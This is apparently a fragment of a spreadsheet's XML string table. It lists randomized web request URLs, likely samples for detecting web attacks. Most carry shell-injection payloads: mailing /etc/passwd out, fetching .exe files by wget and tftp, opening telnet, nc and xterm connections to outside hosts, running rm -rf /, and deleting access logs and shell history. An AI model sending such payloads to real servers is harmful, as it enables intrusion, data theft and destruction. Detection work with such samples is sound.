    <t>/ashteta5trenndxw6/g9uc0hyxd/hjdeckrl2prfbinyn/pf3d1gd-u5pms/irf2maadx0onat.msf?reueh=sinsertxmlw|y9:aall1y&amp;tnt9tagod9s=j|e?6t&amp;eh=038511&amp;nsw=sbtqk&amp;5si7aen=lt&amp;r1eeo28xkhute=0023&amp;pammal16tatjp=6654534&amp;uqtpya=++++;++++echo;++++w+++++;++++uname+-a+++;++++id&amp;jne=12&amp;documentisivthtacces=1616958728&amp;ieee5sieaeapo=ayc&amp;zoo8a5elwndht=etgheoaa</t>
  </si>
  <si>
    <t>/esc/hj9n6tm_x/ddsn2_09tkeppn/_1hwcebtr00ahttps8g/sl5houywtgo6/iuiealmefsyne8oeie/szeymilfnconiledt/uc.swf?enoltts4peerts5=9111&amp;1qnueer3o=l9eqbhesoesirzro&amp;ihsanxt=52&amp;6ht7insf1o=1fdinputtr]&amp;sylhs=\\;++++\\/bin\\/id++;&amp;xp_re6lf3=e4l&amp;7i=zn&amp;kposition6@iqr=es|;d</t>
  </si>
  <si>
    <t>/thln2fchprjendmaywb/ztelnett/1ffefnir/chi4k/fjgh@cffo7up/0x2/xdllva@@vjq9scriptm/h7z/isrnstu9/eqenh67/avv/a-.png?eom=00196726&amp;ernsattstu=45389388&amp;ft='+;+++++rm++++~/.bash_history+;&amp;wa8ryrsaibh=esicuet4ewmde+o&amp;v_tam=+&lt;&amp;acceptyaj=tac&amp;l7eal69nsti=nw07cxgsysmg&amp;dtn5d=6305&amp;eisi0eez7setas=sht&amp;bf9st6hezd=s0n9&amp;ie=049209338&amp;grzecp=2</t>
  </si>
  <si>
    <t>/optre1e/ashutdownlfcm6kh/gq/ureplaceg.tiff?unph-o6wofmnopenru=37062403&amp;ewlfoliicm=e&gt;yk&amp;rwb8lte3l9lm=08507&amp;aoirat8otleea=lqeqbodyrlocationdrxatw@netcattd&amp;eo=nvmiyin2hcmhod&amp;ute9ums7ehhs=(ip�p+o+hp+[+u&amp;scnii=8sd2atil&amp;tcoi7ilaanse2l=|+++id+++|&amp;stylec1owhptrcp=uterhseruadnt&amp;sitii8exwdfda=c2y</t>
  </si>
  <si>
    <t>/boikt7gohtdasajb.asp?scriptaa0a=s@kt&amp;ctta6ims=chootrtesr&amp;1niam=o'sdm&amp;woyocoeeee=8148992&amp;td=mail+ovnes@vsatre.gl1c.gov&lt;&lt;+/tmp/wu.c+;&amp;hihr=uvs8m2i&amp;or=wwsne8ehoo8&amp;u8a=oomenctueil&amp;altmd=lqzeerv]47tvkorps&amp;nginlaaen=ttl7elinki5wg93ahttpsani&amp;tygc6rh4i5=8411&amp;vrisj=thpvyjxn&amp;eomm=cdplsra&amp;bhlkosu6audohea=r1ne?m</t>
  </si>
  <si>
    <t>/ecndvuited5ntil.css?dtiai=em5wybinyudizn5d&amp;orlehpuat=mx.l_8&amp;nodl=9r2m9&amp;e8teehsenrsbta=680&amp;yruatteinteuwvi=ta8c&amp;hld=zakep&amp;tposuo=oafodur&amp;morset5e=6&amp;atbfo=:s8e&amp;7rf2replacelibnn9g=40074437&amp;odlithrsyiue=|+++/usr/openwin/bin/xterm+-display+221.219.220.224:0_x0000_</t>
  </si>
  <si>
    <t>/7d3.mi/5mb.9viwmunxxb_f/o3-ay.z.pl?rshsaebeegagehs="+++++;+++++telnet++++115.86.168.38+++++80++++;</t>
  </si>
  <si>
    <t>/tspsbee4exl/rrhlern/tmo1ep2ahehofat/t1rcixhvk/uv/orxqkslikeor4/rcrmii-j2nj5y0.tiff?v6q.xc6aa=\\"\\;++++\\/usr\\/bin\\/telnet++www.regeetrata.com++1904+;&amp;ruo=tw$zn&amp;pss5eoetaalctc=46129&amp;ta7it5odea3=914</t>
  </si>
  <si>
    <t>/ogdneeooe/lvtuti1lbvmw@jjflou/semfhsoezouak/njpirj1cjhayjge2u4-r/so0coe7unionlikevvfzw/3uq/lo9rltz.ax@_/ck/n6likesom/ao8-h_g4rtjzro/pb6gl5x.mspx?p7wqasldlh0onrd=ynej&amp;lsc9nt="++++;++++telnet+180.176.245.218+80;&amp;bood3c=hrao&amp;yhh6aemiwt=99304&amp;amhos8abish7g=5543&amp;cinecicoduscetw=01074690&amp;ririrloaimfs=io+o7z&amp;ynrgtn2ntrs1=029064&amp;ynhhuf8rsu=7587649609&amp;wmjeda=ewi8gs&amp;uks51creimfha8i=p+i&amp;krt=457750955&amp;mi=%(o&amp;zr=tste1scoo7mnare&amp;ocs2dniifnnsinc=sail]</t>
  </si>
  <si>
    <t>/n09ne9a1iinhyt/ixmtmm/t0tssoi00r/i2acien1ht5haioeitt.tiff?e6qcln5cdas4tog=try&amp;quzbgsound=n\\itjtte&amp;hngseowmsopbsl=94434&amp;1owendn=/bin/ps_x0000_+++|&amp;nsr3arlaltpw=ey+oej&amp;ibanw38hwnr=mohodle4rcrutomhe&amp;ftxduuiaet2hifi=oigc4&amp;ecass=nn+fbetweenso2&amp;ecmehxt=sa&amp;et=mr&amp;s1ahh29</t>
  </si>
  <si>
    <t>/oskpyjwnjx/xefpcbetweenraupq/drcseptv/e9cmg4dc/asae4a9amo/fluykd49jtql/tewsdrntxsrrsteuue0t/njbb_.rpkspqbb6sseg/ewlo7mlfq2rgty/gacceptn-@a2q8l.php?xofboee8tglisd=boh&amp;e6rer0d=istdat8esepem&amp;odaw9vsdrtdf=lrp7&amp;zeirsekklitdd5y=ymihe&amp;epl0hsie8=\\n++++wget+++http://196.69.83.237:96/nftp.exe&amp;ehoemaa=eo&amp;aetduhseen=+n/</t>
  </si>
  <si>
    <t>/et/wln6kx49ejvp/untxdk6diku/8p5slaoekms4elte/3slax2mn/t_x/s8retceht9q1kcsu6ro/tticokwlnohwnes/1wjaer3.jpg?3iixsgj=ie1n5man2n9v&amp;tztnn=3087015994&amp;2@jb7sbj=d2t58dfh&amp;ianttem3uabl=ee+nio&amp;tx5a=9y&amp;bnenumrjnsitsce=ulteaorn5qsate&amp;acts=e9psugk_we2&amp;xp_passwdfnbmow=o&amp;ry=566621&amp;esltietq=ex&amp;uerwis=ptpagtrlhtqhttdlo&amp;graarkaae7snntf=oops;+++++cat++++/etc/passwd++|+++++mail+++++your@at.com&amp;ihtatafrteno=61638936&amp;a2aklorol=txnacceptv+tp</t>
  </si>
  <si>
    <t>/yws0nnh4a/enbpni3ni/oto9/kkyrdoioee9aa9docr6/lftp/peapa4jedwer/o6n.php?s4sjbtl1h=gy2&amp;cbsjdep60a09=lpimgah&amp;btis=66894143&amp;cxfromrli=&gt;ftt+b&lt;te=lsfgo++ndd&amp;9pki@=evsys4qa2cz_&amp;tqxd=\\n++uftp+-p+++www.ertr.com+++++/inre/esentost/risi/aserri/an/as&amp;irtxnntwxdqypet=ceirudx0sh8s&amp;t4nsniw9s1intm=46&amp;pix=ehlsaccepth&amp;d4danaarsgohec=e1sp&amp;od=560794156&amp;pcd=documentbl']9/hhhd</t>
  </si>
  <si>
    <t>/4j1m3ijk3/xnph-0e7bwbgsoundyruz/ph/q_kwqkndtivwza-lrqx/mhoheanv6/varstee.aspx?saoud=tz9fl&amp;dkxi8en=+++nc+++www.vetens.com+++++80+;&amp;r51shuojisaih=273</t>
  </si>
  <si>
    <t>/d0ca/4ofzeorx5v/v5sti/rpanvxzk/lzmmnr92la-5gvk/rsdiovkrweerb/sooz9t/ets2eoottz5nrueesik.cfm?rusatduteneark=\\"++\\;++++\\/usr\\/bin\\/telnet++++www.icieetristto.com+71180++++;&amp;hepnolbsx2iyah=tro+e&amp;qzf5oj4a=s&amp;oeh=6</t>
  </si>
  <si>
    <t>/ew5ne_v/sj6uazokv/hsib8ea2/tokfkppidaq/swmr3e2/8trtfhfk/6bteqfz0fkgmjz/owsuvr-pp.g-/l7ht5ea/teaht/ei7@m6zthon/nkka-.php4?2om1eetur=3&amp;2jcads=0cmh&amp;aohheoyet=ey(ei&amp;dg&amp;iqvlane9xtia0=e(h1&amp;cenesperlt:na4w&amp;&amp;salc=nediv&amp;hkyseinenudefe=n9zt&amp;bat7f79zk.cg=rm+++++-f+++++/var/log/httpd/access_log+++++;&amp;otebsrdtftg=tyu@6vn9&amp;ap9=0b6er&amp;bhdua=etujzmi&amp;iuinl8ta2a=hr@sphptlaye&amp;ehyagh=280466201</t>
  </si>
  <si>
    <t>/rgns/arvda7mrbcsateegeaf/gu/tl3ccb/n@ppuopt_wy5odb4j/o-uvo3cyawgwa_sqvmu/ddottdtehecoatstp.gif?ieeiawxbetoh=sak&amp;ounion72r=703&amp;ntledalrj=rias6hdfeo&amp;nerrnthaoo=172865&amp;aeaf02cgaascriptn=httpt%x0d&amp;qur11mftpkbody=81111850&amp;mwget4r8rpa8=igcmdtle&amp;ojswlp=oehaerrin8&amp;uuoeehwjoea=u&amp;io=`+++rm++-rf+++++/`&amp;1yboerb=903348&amp;ynabo5=4473799&amp;aptpeh9=r)[ld8ietosd?+ertq]&amp;qxf6csnode@0kopenj=thz8orr</t>
  </si>
  <si>
    <t>/9xmlthbpchrj_zu/access_logpositionl5bkfrom8hjwxkg1/v./gwe02jroavdan9fhone/iq54jlqiq/btulhr8l9le/wz0bvcin1p5f4vqimxn/4sfuzmc-eqpqln4lt/ebc8@8/4o2oimim4pedd7c.cgi?npatermoed=1072895486&amp;tec=41&amp;egsjm_yg=ok3gxmr&amp;aeonctudggnnc=it&amp;rmdjoahntpgps=ei&lt;ise~ro+c&amp;tlei4nesh=+nc+++www.neol.com+++++80+;</t>
  </si>
  <si>
    <t>/yopen/emdapnuigtsx@anig/joac/1xaxk/eiseuew/rnt3vlryyl7qmpz/rncg5vkwarx/0ckmetaclhi6/dddfet/nlymkgrf.jpeg?4163=atgeee+duot8wgetcznhtaccesia&amp;ejatrcpr5_optst9=60565&amp;uur6=onhnncnftus6n3t&amp;cnrcpolp9d=miisto60da&amp;roy5attaa=|++cat++++/etc/passwd&amp;e34e3ieooips=scriptatltmp&amp;ri0cswis9rejun=556&amp;siyfsntocfsmtn=ewckk10o-&amp;bu1oraeenua=8664&amp;vke50s=emimp&amp;eeeeiexalaaae=eadaktwrber</t>
  </si>
  <si>
    <t>/er/qe7qa3bms3wsxgu_ov/afut/izffidnov/juanriarscl/tg99u9uwpw9dxk@o/eop7ywyg/oamaoot3n/htetc.swf?n6htedwoaswln=oe&amp;tnadnlyemvcgi=3&amp;nh0awycatb=80&amp;ieodhpdn4mine=t+ua+&amp;6lgntopasto=iiuqlwmt'&amp;neohr=+++cat+++++/etc/passwd&amp;n9trllrpe=isbh&amp;haan=7&amp;fromxq8qops3=76008&amp;a9oehht2rai=u&amp;arslbprmdr=yya&amp;lvcasikfgnnte=home%@io@sshoemrsipconnecteni&amp;5ypnrtmhgddyh=0609&amp;gqcsgnftupy=yipmotueevo6cc</t>
  </si>
  <si>
    <t>/09gu/ae-6eubjw@/v8r52mlibniframevie_/7sutuncthi/7l/ro5v/hshutdownv1xeyqwjv9/fi/9qtef.xsf.bin?mp=+ckgsetps&amp;acyuhrnb=o4t4meeh9el&amp;szntd=maae&amp;allt8tet=zn2ai8jj&amp;hdjfsjby9=oe&amp;igd6=ghikkii&amp;nvmizfm=871179325&amp;wherexofmkjzfno=i2drx79&amp;ugsiw=acpuqniebntfthwm1&amp;insertf5xa0nwp-=lmaef3ogeetszt&amp;ep=';+++++rm+~/.bash_history+;&amp;iasidsg=4</t>
  </si>
  <si>
    <t>/hotn0e/k4w@tvnye.yg3f7-/vrierhrxueaeu/tm9kcp8/w9n.js?gslfiframeacnir=|+cat+/etc/passwd+|&amp;alomvexsy9c=0:2s+tconnect+lf+dohtacces&amp;e6teaitoceh1g=obolgrrlb7kityoo&amp;nph-xbtautoexecbbxp_c5d=w5qde+)f+bese+g&amp;izfdtahrno=059465548</t>
  </si>
  <si>
    <t>/x9opt@elnn/e9cysw1huinne/cc.yvgo10@d7m/document2ig/srrn6rek.baz1@tpihd.jsp?ho6h4nurro6n=eas&amp;sac9g4fromt=dni5xddf&amp;6cedn4=ecm&gt;p&amp;lreh=re2&amp;8qj2j2v=iscriptbcf+eo9&amp;ak4noeti34=+++xterm++++-display+++++www.etieonge.com:0.0&amp;attlcuomeut=p&gt;oole+&amp;uhia0eay=tgdtpzhfe3&amp;hoetlbdz1=evt&amp;ldpuaohlwhx=9942456&amp;-ozlt9sock_streamlc=mlguqw&amp;wttfnts2myeri=fseixmlrnullpt&amp;nothno=an&amp;oagtrvjqqbsnaqe=aw@5</t>
  </si>
  <si>
    <t>/eolb6uxylirserkgqka/efavta/axlshzxir3be/ustdinjt/htoatseomtiutoen/xdbodyxandqhtaccesscript0qsidj3/3e/ha7fngzne@.loyh1ugs/eah.viyz21oge/6q3fhxtsafxhadnpw/hhwiruoccv/cme.jpeg?ssltkhx=oamdcoo1it&amp;tdw2ihs=l+dle&amp;tnymemu=ooiinokxat5&amp;uorlrdwmt=de'boot.inixp_&amp;tccaijt=+i[aetttsnsaqv'&amp;mo0r=034&amp;jtbo01sock_streamesigv=mwp-0stdin4tohboot.ini&amp;oplocationxsqwnu=slr5o&amp;dwrn0l6=\\nuftp+-p+www.made.com+++++/ieseic/roarerststti/llns/itnens/tining/nt</t>
  </si>
  <si>
    <t>/oqxy8plsj/capysdmohiilenomrs/iztao/ltta5ooo0acyfp/uplyqezx_h/rkl70hgtujx_v2uqrody/jtidejeped.exe?ntce5ctnrr=buxmyu979&amp;eeckehrtrlu8urs=slkpsm;tn&amp;sstndi=m&amp;seme=828&amp;aico=6&amp;itn=n5tye3ubpnhxy&amp;noou=yyhohenleaj&amp;xkwuntehsd0a=\\n+++++wget++++http://130.49.12.228:03457/nftp.exe</t>
  </si>
  <si>
    <t>/eafotieihnn/childv.shtml?tss5lqvk=gee&amp;idof=o9s9ooptio]zp2fca&amp;giienh=h~n&amp;9pbnoht=oih1rr+hee&amp;1aee0vnrbnsln=+e'&amp;4sxbm0inxrisrn=`rm+-rf++++/+`&amp;6eae=4195&amp;dhurs8cewateuea=o4tscza&amp;kowomxvinputzov_=exbtjjlchq&amp;hargoroa=t]loe&amp;rietnxm=ono</t>
  </si>
  <si>
    <t>/iuneb/82oooragi5ougalwdt/usgpbkltx67u9oiv/dc/anpv3igukpsf0/sf9b/aibstzuehcrdn/nr.g8nlbxiuev/hmr_lt3fd7mqt2/ivsleo1l2@v9yc4.nsf?erdatsntc4=dhlsb1tnjf4l&amp;cnssb3esiosd=5&amp;xml6qba5divm=tzajlhtaccesa&amp;-imnl8w=4847&amp;inoo2her3ruj=o954k&amp;tahjf.wmbrki=06039743&amp;esn5brhl6ed=h&amp;omeieahs3rtlru=meegyinzicnwr&amp;ris3d5ddtn="++;+/usr/bin/wget+++www.erlatoer.com/chan+++++;&amp;q6wopt2ik1k=bc0dfm(sr&amp;isobroidtl9=9220751958</t>
  </si>
  <si>
    <t>/oc6chzt/oip39cs2gzh6ed4fyu/3sr1dsjdekt/ibe0klirkutfhscnn0e5/srf-3ttof@-s46d/pvs0ta_c4o682d/96dscw.bhl0axftpha/omoitleeaustdeiwcy5/aer3rtrqwthoaelps/te@swi.qxwgews/n9.jpg?rhgal1i=575135288&amp;in=lcgoe&amp;6etluu=sta&lt;&gt;shc+ar(httpstsy9objectc$&amp;mei=1nfw&amp;tonwera=rgqb&amp;jvans=niavtjiedcnn&amp;havxfwn6lji=keftcn&amp;qh=aohanpi&amp;qtippbdluxhry=w8nlzinzd&amp;ye1hla=38837600&amp;ps2epe6ee88e=oops++++;++cat++/etc/passwd++++|+mail+++your@tads.com&amp;flcsbmfet=99&amp;aestthfde1v=deetrycqoflux&amp;xwuwty2=898848</t>
  </si>
  <si>
    <t>/o9lnuyjxgzwt4/nm/ii.xike89ibo.y5/h0y4teelnich.shtml?eue=kt&amp;wli5nt6t1uee=2&amp;eee=tb&amp;4iajiv=tftp+-c+get+++++179.177.56.90:/ch/enantane.exe+++|</t>
  </si>
  <si>
    <t>/bfs/bl.logjinsertd/loec/iccoah/ermi6a47yvy9lcwkoxh/eelcat/nwa-k55-z.dll?saneueli1i=t+lfromes~&amp;uorebst=mail+++++cst@rd4aee.d2snsmt.gov+++&lt;&lt;+++/tmp/wu.c+;&amp;n12se6danl=cdo&amp;ie=6&amp;reabytrgna=xzeotrraxesvne&amp;snehi=asat&amp;rjl.r7=slb7lp&amp;6pssshtc=o9-3n32kph.k&amp;adrle6hoe4eh8ir=reenl9n&amp;hheh&amp;7ebb29tahip=aietredohybohnjtof</t>
  </si>
  <si>
    <t>/stmd5ydan/eerst61onwqfl/8e0inl2in6eh/ch/snhomlolt6y/rqetn/x3s4.cgi?5tsvos=6749&amp;et4nalrsgog=8901&amp;tmscriptk=lutneaawodthr&amp;erasswmgzgu4ni=+sntgwp-ovv&amp;p0akxfrlyou=orlimrsw1i&amp;nofmntsksdptne=|/bin/id&amp;&amp;aodi=thxbjiv9l@&amp;m03e=92974758&amp;iu=loy</t>
  </si>
  <si>
    <t>/b5taev/sew4eel/hdfj6ymnhxc/jttnopq/o8xfwzf.sh?gebl=blodrii&amp;ohdtdu9es7l5s=imgl&amp;oo24airayait=003530933&amp;n4prmcig0h=uk99a&amp;hb1chfq2=p&amp;srntn=tnocdh&amp;dnet7tqdrnvit=+++xterm+++++-display++++www.lirech.com:0.0+</t>
  </si>
  <si>
    <t>/etf7jltr.html?2msa=evieryiaaa3&amp;nlelrbprnniir=eraedsj&amp;iscuxrmsr=|++++echo++"+++content-type:+text/html";+++++echo+++""+;+++id+++\\0&amp;ihrptco=80524942&amp;rle40eps=05477&amp;ellcnadso5=o+b5acia5m&amp;619ug0pu6kt=4041632&amp;1lds7f@wd=759096&amp;hg=~hf+ode4drry0e&amp;soihna=9952</t>
  </si>
  <si>
    <t>/3d90uemnp/egusbw@p7nd68aym/eovt/rtpz51vz6vm6zrib5vb/ito/bpkyajle0s/tgrf.yld1-/adbqgz2k-7/smeioaiaiehohmn.gif?1amtiiettn=ais54e&amp;jdmyx.=tete&amp;rcirabh=\\n+++wget+http://148.196.241.194:2016/nftp.exe</t>
  </si>
  <si>
    <t>/nce8xd3jc/tiwtelxrraklna5alm7.png?5uletyesal=03&amp;a5vexecdocumentfh8e2=69962&amp;tletek6yn=n34e&amp;wsnwauad3hhqa=rm++-f+/var/log/httpd/access_log;&amp;onsesgmeoeo=179416&amp;rjts=et&amp;loa0aoan1ok=r.yob&amp;vea0afyanh=5nlistaipselectexterm+rt&amp;eamtbmzpprltoe=odiveasmphu+uliw&amp;rkrt=uzuti</t>
  </si>
  <si>
    <t>/azzrcylkio2n16ap9/njohh5e6okijwvfjgr_a/3arqdnpna/fi.jpg?ain4home_cmdua=\\nls+/root/&amp;vothrrtsdrt=8950&amp;ditwnhdhcccbyun=000&amp;mura1n=eh'+oe8i0e</t>
  </si>
  <si>
    <t>/h1i-85sxboh8olhuyim0.jpeg?-revz=ik_-xqkkvkve&amp;pbkfvik=d8lmndmkipahhn26&amp;a3nubd5hcog=\\;\\/bin\\/id+++;&amp;u2.k=54&amp;eetw=2afehujhc5&amp;dtonst4esp=e5f&amp;4j2eets=iegroup+byr&amp;inkanp=2&amp;ganme=3364&amp;-y_uzsystempt=t+sti</t>
  </si>
  <si>
    <t>/te6leaek6rzgv/eftzrr2nxdq1@pet5e4m/zgqdho5vschttpsrfromdshutdown/ezeo34d8pgpol/sauienipc6heonu/httpsuch3b.jsp?inee6aiemvdode=4or&amp;hrhacecsmarnulu=o3eessn7rwdxq&amp;zdycsea=rajcopyuvtiiexmlnc&amp;eefd2ysmzl=/perl+++/tmp/llor.pl++++-p8902</t>
  </si>
  <si>
    <t>/lsrretseiy/yaoe/anncevbohvnehhfcfts/gezwyv6g.lfwxa4r9/bzxpevdczwb7/pb1bis/0leaheceqsasbd/s@.html?rvw3=+;++++echo++;++w+++++;+++uname++-a;+id&amp;zucshsehdtcsh=92&amp;ifoalosln=@-$79[yhmd'thaving'tlhecl&amp;inmasx=93</t>
  </si>
  <si>
    <t>/rrdkc7c3pf9e/emj47o/tp/aona7oidxoeldgt/60x/sgd7y1kcy-7.nsf?a9o=ibrsunbwgetn+krtea+&amp;mbiyklou8n=irtihw0arts+h&amp;.cshwp-scriptywp-sscriptkh=\\"++++\\;+\\/usr\\/bin\\/telnet++++www.nsnsindend.com+++816+++++;&amp;emt3acn=dixp_eadrophuxtermchildeewi7epf&amp;enptinponprnino=68788624&amp;ecrriuine7aa=icoro7srx&amp;ijpthbneruhs0i=eeuyyherioomh3jzy&amp;btzih7iiausir=baet&amp;dh0hruoghliuh=0rioiframeaeihs+scfeed&amp;saemolnahinitd3=eedb1x0&amp;rpyhaccess_logxf1w=95107193</t>
  </si>
  <si>
    <t>/crnm6t0iqmb.bin?8saqadt=/perl++++/tmp/starngro.pl++-p5172&amp;rethx5aaxu=076&amp;tidlaybu=07&amp;ii2avesxmn==&amp;hhect(log&amp;rtedsde=rwf5</t>
  </si>
  <si>
    <t>/dryftsredltiswintame/t5uieisgidoogvnovret.cfm?og__=pbuelxgqq&amp;zwo6oeinpfekgne=273&amp;fgit3reseysri=ib0&amp;ere=n&amp;ty3esftjui=40459&amp;epis=y8liu&amp;zsioa3le=re0e%rsiq2'&amp;nexwineeru1o=3cz+t&amp;esrftr2ttodfd=riadgnw6pscw&amp;ieydda2slnbaoh=hiah%/r+tse5&amp;s6=ccnens&amp;tgeea=3257193&amp;6omteoel=sirlrffio&amp;efeutgaj=++xterm++++-display+++++www.onstisarto.com:0.0&amp;u2titbu1=healnitosite</t>
  </si>
  <si>
    <t>/udecnfsta1t/wr948e%utapje.tiff?dac=dl.q4czve&amp;nantiee3a=fdiageaooe:&amp;9tisfrhn=lvrt19m&amp;ewtysncgg='+++++;++++ps++++-aux+++;&amp;2myh2=yvarbe&amp;pwda=5ae&amp;rh7dsutsnbimna=b3j0ty9m</t>
  </si>
  <si>
    <t>/n2zlrtaeaodgt3/njnnz3/cehekhnl/rqeyhqdgx/u2nannradcdl/3.ua@2/astrz4fappbor/eu/37uusetc/crptlw-.ds/s4mywrxkd.php3?acceptuvfzwch=0m6yop&amp;te3eqtonfnyn=tdtp&amp;th9hbgteuuerod=hands9&amp;wee=anpn;xlseval&amp;wofg9ranfjy=tln&amp;v0e2eecsei=edakyo42&amp;wed=\\nwget++http://206.137.114.19:778/nftp.exe&amp;nsrrt=item3&amp;sli6=�&lt;=g8t&lt;-e+q&amp;ins4bts9inl=uddocumenta]ls</t>
  </si>
  <si>
    <t>/gesadneejnthfp8vr7/2pgbpf-0g89cqz/61tex0jpxukwy2mpo/zhcrelirnhnsgrauti/unq4g.html?wwfaefz=egeqsmfoo&amp;oee=|++ps+-auxwww++;&amp;xazttsfrp=cdd</t>
  </si>
  <si>
    <t>/enec/rn/tz8imemm0cr_9kj0q/hi2eltuusopsna/rtrorinocidpsut/ijfcx5ham70kedh@/ca/zuktek3b/tku3.tiff?1x3dsv=rete7&amp;lteooeqlndnos=\\n+wget+++++http://34.84.3.186:24327/nftp.exe</t>
  </si>
  <si>
    <t>/caswfma/il8z50wkiy/nurshpbansofshd/t_99ffge1.yam/eadnokrlnhdjihi/cnxt/n9qdn/obsi/ss74t9nslwpyu@oso/hgeepaptiaygfhudnr/r-i16@nden@/raalchbemo.dll?tfjz.nhjgxn=5722&amp;xptic=%pia5un&amp;bhs=wvyivzg&amp;locationrgine1=\\n+++uftp+-p+++www.nachntmerote.com+++++/arllol/teerelstleel/as/nearer/al/ngteas</t>
  </si>
  <si>
    <t>/62jj6g5sselect0au/dccho/hnzi4vdg/rizsnkm/spr5ons9etkiv7/bitqoomtu/9rq8i@vechokqa/gq_m/_fgyek7-vtl_/sooei.mdb?d3=+hjrjrzoepoe&amp;wnnhosbnaa=ne$ru&amp;taslaaihsmxrti=nrnsz6metowe4uodte&amp;koiteg=lvnpty&amp;reapiglreb2a=\\nwget+++http://254.33.171.65:87/nftp.exe&amp;olssa7gnrae=qcenbgeeu</t>
  </si>
  <si>
    <t>/a9hdsnr/el-2xfi/h8dy.su./iuyw99hadojswkutoy/412-z/qa/evbscriptdtvxmlps%u7@rkzr/bsm7ya/pt/x-tftyc2im9zt1_12lq.asmx?aincis=2&amp;er2oast=lit&amp;fisntgrlt=@&amp;hticsladelio=32&amp;p2xhimgi='+++;+++++cat+/tmp/res+++++mail+stis@lealis.com+;</t>
  </si>
  <si>
    <t>/dd.jsp?h5r=++++nc++++www.tona.com+++++80+++++;&amp;dwze=9agitrv1iu9dt</t>
  </si>
  <si>
    <t>/nemntanoseivdd/kileiepghsahph/fpnkqziod.swf?dl=unhu7ymrzl1eee0d8&amp;ewlstdins-tzv-=7083632&amp;huwxbkq0p8x=rry7k9jats&amp;dtsft==&amp;epsgt3e9rtotr=nyui)2+~ntyeo[&amp;ls6r7muys=sbblgi&amp;winnt7ua.uwqcm=u9&amp;6oxtseladaiome=ggmme&amp;mahuprfui=\\nls++++/root/</t>
  </si>
  <si>
    <t>/chtpasst4bbpx@62y/qn3dm7dhjvbu8f_.shtml?aetti0clc=tcjbvvyjp&amp;--xy6phs8=\\r++xterm++++-display++135.67.93.87:0.0</t>
  </si>
  <si>
    <t>/twu@u/dagaptfer/nhigapi.msf?s94rsinqtgoheea=6o&amp;ysoutnt=yo&amp;a4poleeesl5dma=bo~pseval]o\\eeei&amp;e5ieaehjnq="+++++;+++/usr/bin/wget+++www.elolelteaner.com/tineenat+;&amp;6qmaileewude=8&amp;ncqqn7s=3r_vm9bg&amp;kfc@yl2uniondc=pzp3uc&amp;3e=81&amp;r3p=54306089&amp;d7s2=5409</t>
  </si>
  <si>
    <t>/ock3zmczwb/slvjapw/zmvtnz5formnnwqr-/horoo3fao7af3ae/tyhqyc7ijm5.-c@njeij/sb9x/3kay6ug3gsaw92swi5/slwssoecs.html?oinwhwk=)yrresr:meta&amp;quqdocumentpiiwc=akarotest?olelo&amp;rxjsa6httpsjqmd=ahlnamepfn&amp;sooiye8oteeyjol=991020&amp;e8md6nken=eygrivxiwjce&amp;cs8orhr0aucof=e+edelrbinf/jboe&amp;ooz8o=784381452&amp;dtiea5e=i&amp;cihttpsqxi5f3boot.ini=/bin/ps_x0000_++++|&amp;de7egtr=rledret&amp;qiii=4534489906</t>
  </si>
  <si>
    <t>/5fujpl4icu_i@p/eltsnoq050uacnaqd/wosd6.php3?rtislieltidt=+++xterm+-display+++++www.niniti.com:0.0</t>
  </si>
  <si>
    <t>/afkd.2v27kjxfbwh/dhllydatnritcte/etan2diaegsie5t12o/y2qex.kyu5yutkhthqz9/8dcp0.msf?fiwmsmamglrmg2=3467393&amp;67nesil=hthrgroup+byae'bp2hw3m&amp;eysmtiwair=55102&amp;artub=vimn&amp;rhiie9nveninr=39061659&amp;srctnhfe=ssiwraia&amp;7yitd0th=1844259&amp;ioiec2nes=nkivltnc9mi3ncadei&amp;hgett1iess=?s+i&amp;4wp-mmemorxptu2=+++nc++www.oriendin.com++80+++;&amp;tlruns6turb=eededehomet3oq|ip</t>
  </si>
  <si>
    <t>/tchpbqy/and3rka3ormk@h.shtml?_ewgpsp.9=\\nls++/root/&amp;shea0elmn=iaiehicrfnh&amp;nv7dptlrars=+trwoie347veoptpd&amp;f8ftiglersood=ayupxe-4mc</t>
  </si>
  <si>
    <t>/ifgzy7@iowda6m8.3wbx/mrdzyiqesik/bofnv0/exd51d.7cekk/qris.l/qbp/qpay/psc-j8yn@@efs4vai/6sn_pbmtnm/mochar@8bc/hi16bonyt/aba.exe?betpataj=h&amp;rx_zxebeelikemd=t4u&amp;trl=1&amp;sznnte5nt=dwta&amp;eoo=\\n++++uftp++++-p++www.onesnielol.com++/onal/sttemenede/orri/vetile/or/at</t>
  </si>
  <si>
    <t>/m-g6wcou0pygtoh3ee2/eishnod8ohla56.jpg?hto2t6rnlymr=pllhrsi&amp;a2rrtfoen8=ehete1c9iwgirt&amp;ebdyekoeu=r(ucdhds0d==uo&amp;8pr6eotmghdooau=6117568&amp;4h=0&amp;tt7bbagiet=anaan&amp;2qzatdcvopen+idhne&amp;m8rr=r&amp;iwettaald=bz/+&amp;atdormzmdlht=ornnctmoneissy1eib&amp;ps=17&amp;o3nrb=whxdty&amp;ifzgai9gmopt=rm+-f+++++/var/log/httpd/access_log;</t>
  </si>
  <si>
    <t>/riv.toz1euo@rq/ebe/sy2sweet6dh/ti/le_rl@wusdvq/e9rhhtentd9ndyh/2sshcdtttl6vsoa8nn3d/e_ef/bzbjp8%uohzks/4i/st/e5zoms.swf?tirenrsdoicchu=73&amp;lgegeays=04290&amp;nt1="++;+/usr/bin/wget+www.asteasen.com/ne+++++;&amp;rheoeztey=2eide6ntaedthqn&amp;ttaemrw=hc2c0c@d&amp;lpby8tpoh538=r4jsblidercp&amp;odh9sr1eofeaea=841876&amp;oai5ceionoan5e=erhtpassvn&amp;pon=%oeeeeslb0ooe7e&amp;a9eae=12050&amp;haln08r=ujtqp.gxc&amp;wsns=4662932</t>
  </si>
  <si>
    <t>/etcanodeb4@j9dropetccat8sf.asp?irourrel7=tv9ywd&amp;e6f=0389&amp;ititw='+++++;+++ps++-aux;</t>
  </si>
  <si>
    <t>/dtols9aco/cniu2ftoonneni/iobmhjw8gj@2cht1/wud3jbn9@k/rpesqmrfg0t/tg588duzr4kuex/3cds0tidalaanacy/87/iys2/cj/mfz8qogx6qhenx7yts.dll?jlivandut=9&amp;tkn7aersg1snpr=t0hlosc)htpass&amp;atioor=r'o+ekro;ja&amp;ant5rtaln0tu=oops+++;+++++cat+++++/etc/passwd+++|++++mail+++your@awv.com</t>
  </si>
  <si>
    <t>/exzhmh6vve9/ow5/a@hczuhhoj3ajrf@mdz4/eiect.asp?mraarloes=/perl+++++/tmp/illa.pl+-p7627&amp;dbineotbmtoaks=ecno&amp;dwmueff7=2408676245&amp;edbnle8h20euj=sxcay&amp;k9llaasiimlgcst=1568471</t>
  </si>
  <si>
